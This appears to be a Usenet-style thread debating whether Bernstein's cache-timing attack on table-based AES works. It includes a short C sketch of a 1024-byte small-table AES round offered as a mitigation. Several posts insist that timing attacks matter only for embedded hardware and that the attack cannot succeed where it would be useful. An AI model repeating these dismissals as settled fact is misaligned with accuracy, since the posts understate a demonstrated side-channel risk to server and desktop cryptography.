As to "is this new?", no. But the fact that it's so applicable to AES,
even with a 4 KB table which "easily fits" in the 64 KB L1 cache, threw
me for a loop.
I can't tell you specifically why the attack works [I'd love to figure
it out, but without detailed specs of how the processor works the best
I can do is guess], but I can assure you it does actually work.
Tom
Be careful. The naive-simple-cache timing attack only works because
the S-Box table gets thrashed in the LEVEL-ONE CACHE. Commercial
servers are going to have an overall system design that can support
the 4096 byte table. karl m
How about after the first TWO blocks? At that point the thrashing will
either occur, or it won't.
> Not only that but you don't know when the cache miss occurs. Doesn't
> tell you much about which lookups actually missed [because of the change
> in input].
>
> That and the fact that both Brian and I cannot reproduce the results
> doesn't bode well for the attack. Perhaps you could post the source
> code that you ran and we can check whether we implemented it wrong or
> you described it wrong?
Professor Bernstein did post a detailed description of his encryption
implementation. Did you try implementing that? Have you tried
running the attack on your LTC code on a few different platforms and
architectures?
karl m
Then we have an answer to the naive-simple-cache timing attack.
Specify a LEVEL-ONE CACHE for an embedded system that operates at
least at the Intel P3 or P4 level.
> > Also if his intention was to suggest that implementations ought to
> > tighten up then why would he propose Salsa10 as a "new methodology"?
> >
> > I'm forming my own opinions on his motivations but I'll wait to see if
> > he'll post his test code before sharing them :-)
>
> I remain to be convinced that this is as serious as DJB is suggesting.
As well you should, as it is not based on sound engineering
principles. Have you changed your mind? karl m
Exactly. Why Professor Bernstein is concerned about cracking SSL
with physical access on a desktop platform is beyond me too. karl m
Yes, Professor Bernstein or his students know this information. His
code multiplies the variability in question by five. I don't know why
he didn't answer your question, but when he does, perhaps he could
explain how he came to choose the multiplier.
> Does anyone know of an example of an AES implementation that can be
> compromised in this way by a remote attacker on the other side of a
> wide-area network link?
karl m
The only actual attack of any interest is against the embedded SYSTEM,
which is engineered to display constant time, or to display random time.
The naive-simple-cache timing attack can be expected to fail precisely
where it would be useful.
karl m
The only real world setting where timing attacks matter is against an
embedded SYSTEM, like the hardware cards used for electronic banking.
The secret keys are embedded into the "hardware" and if physical
access can be obtained (like stealing an ATM machine to get to it)
then the secret key can be obtained. Such systems must be immune to
timing attacks.
> The code in the paper demonstrates that there can be a dependency of AES
> execution time on some index into T. What the paper is lacking (or which
> should be done in a sequel paper) should be a demonstration that key
> bytes can be recovered at least in a controlled laboratory setting. If
> this cannot even be done in an environment, where almost all parameters
> are under the attackers control, then a real-world attack is infeasible.
He's hoping that someone, somewhere, engineered an embedded system
that suffers LEVEL-ONE CACHE thrashing over the 4096 byte S-Box table.
karl m
Why do you think this?
> But the effect is very dependent on setting up the AES tables in a way
> that invokes specific cache behaviour.
How did you determine this?
> If timing attacks are a concern, much smaller tables can be used. I
> don't see the effect on any processors when AES is implemented with
> small tables (this reduces the speed by a factor of about 2).
Do you have an implementation that demonstrates this?
karl m
> > abstract level.
>
> Right. An AES oracle---a magic box that, given n, prints AES_k(n)
> exactly one time step later---is, as far as we know, indistinguishable
> from an oracle for a uniform random permutation.
>
> The problem is that real-world S-box lookups don't take constant time,
> so real-world AES software doesn't take exactly one time step.
>
So you do have a different view of the difficulty of implementing
constant-time AES than Professor Wagner does. karl m
These are all going to introduce randomness, working contrary to the
naive-simple-cache timing attack. karl m
Were any of these implementations immune to the attack? karl m
Right. This is the threat model for the desktop platform. Timing
attacks are only relevant to embedded systems. I don't see why
Professor Bernstein leaps to his "anti-sbox" stance for desktops,
either.
karl m
It's of some interest to the embedded system programmer who must ensure
that his AES design is matched to his hardware platform. What kind of
programming do you do?
karl m
Resistance to timing attacks certainly is mentioned in the AES NIST
paper I used when writing my reference implementation, in both the
MixColumn and S-Box sections. karl m
> attack is able to exploit.
Exactly right.
> But AES can be implemented at about half maximum speed with two tables
> each of 1024 bytes (or only 1024 bytes for encryption alone). While
> this won't completely eliminate timing issues it is not pressing the
> cache anywhere near as hard and will therefore be far less likely to be
> easily exploitable.
Have you implemented this approach? It would help the embedded system
designer whose hardware platform is exhibiting thrashing with the
larger tables. A factor of two is certainly better than the factor of
ten in the reference implementation.
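For anyone who wants to see the shape of the small-table variant being
described: one round column can be computed from a single 256-entry table
of 32-bit words (1024 bytes) plus rotations. This is only a sketch under
my own assumptions about table packing; the rotation direction depends on
how the words are laid out, and the names are mine, not taken from
Brian's code.

#include <stdint.h>

extern const uint32_t T0[256];   /* 256 x 32-bit entries = 1024 bytes */

static uint32_t rotr32(uint32_t x, unsigned n)
{
    return (x >> n) | (x << (32 - n));
}

/* One output column from four input bytes and a round-key word, using only
   the single table; the full 4 KB version stores the three rotated copies
   as separate tables instead of rotating at run time. */
static uint32_t round_column_small(uint8_t a0, uint8_t a1, uint8_t a2,
                                   uint8_t a3, uint32_t rk)
{
    return T0[a0]
         ^ rotr32(T0[a1], 8)
         ^ rotr32(T0[a2], 16)
         ^ rotr32(T0[a3], 24)
         ^ rk;
}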
> It was this option that I had in mind. I have run DJB's timing attack on
> this code in a P3 - where the attack works for large tables - and was
> unable to see any timing effects with his code.
Was this because the table requirements on the cache are met by the
hardware system design?
karl m
> I also did this separately and we seem to agree on what is involved.
>
> I don't see the effect described in the paper either.
>
> Brian Gladman
Did you ever make any progress on this? karl m
I have another suggestion. Why don't you try disabling the cache
altogether, and test the timing attack on both LTC and SSL. That
should settle the whole matter once and for all. I'd try it myself,
but my REFERENCE IMPLEMENTATION doesn't use up enough of the LEVEL-ONE
CACHE to see any of Professor Bernstein's effects. Thanks, karl m
I see you put quotes on the silicon portion. With programmable gate
arrays, who's to say what this means in the first place? Mr. St. Denis
led me to a much easier solution: just disable the cache. He's going
to test this approach and hopefully post the results shortly.
karl m